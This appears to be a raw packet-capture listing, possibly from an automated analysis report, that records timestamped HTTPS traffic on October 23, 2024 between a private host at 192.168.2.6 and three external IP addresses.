                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321588993 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.321619987 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.347356081 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.359328032 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.359354973 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.363354921 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.366395950 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376214981 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376446962 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376518011 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376562119 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376562119 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376585007 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.376597881 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377239943 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377439022 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377703905 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377746105 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377760887 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377780914 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.377787113 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380179882 CEST49877443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380212069 CEST4434987713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380321026 CEST49877443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380484104 CEST49877443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380491018 CEST4434987713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380630970 CEST49878443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380692005 CEST4434987813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380768061 CEST49878443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380901098 CEST49878443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.380934954 CEST4434987813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389472961 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389494896 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389555931 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389570951 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389600992 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.389667988 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.418204069 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.418428898 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.418447971 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.419572115 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.419982910 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.420114994 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.420121908 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.420156956 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.427413940 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.427623987 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.427634954 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.428740978 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429326057 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429394960 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429409027 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429502010 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429864883 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429874897 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429892063 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.429933071 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430005074 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430011988 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430052042 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430075884 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430088043 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430540085 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430819988 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430927038 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430932045 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.430942059 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437592983 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437608957 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437664032 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437670946 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437681913 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437689066 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437700033 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437731028 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437745094 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437752962 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437758923 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.437797070 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.438329935 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.438378096 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.438431025 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.438477039 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.439074039 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.439122915 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.448839903 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.448970079 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449064970 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449114084 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449125051 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449222088 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449295044 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449299097 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449369907 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449378014 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449404955 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449476004 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449498892 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449631929 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.449686050 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.450488091 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.450500011 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.458353996 CEST49879443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.458374977 CEST44349879141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.458486080 CEST49879443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.458882093 CEST49879443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.458895922 CEST44349879141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.477863073 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.477878094 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.477907896 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.477926970 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.477945089 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486036062 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486082077 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486114979 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486129045 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486145973 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486170053 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486181021 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486195087 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486202002 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486212969 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486241102 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486243010 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486258984 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486264944 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486310959 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486329079 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486403942 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486418009 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486464024 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486496925 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486512899 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486525059 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486541986 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486592054 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486594915 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486608982 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486627102 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486651897 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486677885 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486696959 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486696959 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486743927 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486840963 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486860037 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486875057 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.486975908 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.487052917 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.487124920 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.487138987 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.487155914 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.487726927 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.489160061 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.489173889 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.489949942 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.489968061 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508128881 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508162022 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508256912 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508256912 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508266926 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.508344889 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548572063 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548597097 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548638105 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548649073 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548738956 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.548929930 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.549822092 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.549843073 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.549915075 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.549915075 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.549931049 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.550282001 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556421041 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556467056 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556474924 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556500912 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556529045 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556529999 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556550980 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556569099 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556602001 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556668997 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.556715012 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557295084 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557316065 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557383060 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557404995 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557518959 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557663918 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.557693005 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.563190937 CEST49880443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.563235998 CEST44349880141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.563515902 CEST49880443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.563688993 CEST49880443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.563699961 CEST44349880141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564245939 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564363956 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564407110 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564454079 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564496994 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564538002 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564567089 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564567089 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564578056 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564610004 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564635038 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564665079 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564667940 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564680099 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.564724922 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574836016 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574903965 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574943066 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574975014 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574984074 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.574997902 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575050116 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575062037 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575093031 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575103998 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575115919 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.575229883 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.576078892 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.576090097 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.579710007 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.579739094 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.579874039 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.580058098 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.580069065 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588143110 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588179111 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588207006 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588221073 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588242054 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588257074 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588265896 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588287115 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588293076 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588354111 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.588359118 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.593926907 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.593950033 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.594037056 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.594064951 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.594156981 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605700970 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605796099 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605838060 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605843067 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605863094 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.605885029 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606112957 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606180906 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606240034 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606252909 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606501102 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.606513977 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.631977081 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.632002115 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.662322998 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.662338972 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666764021 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666790962 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666896105 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666897058 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666910887 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.666956902 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.667490005 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:12.667510986 CEST44349817141.193.213.10192.168.2.6
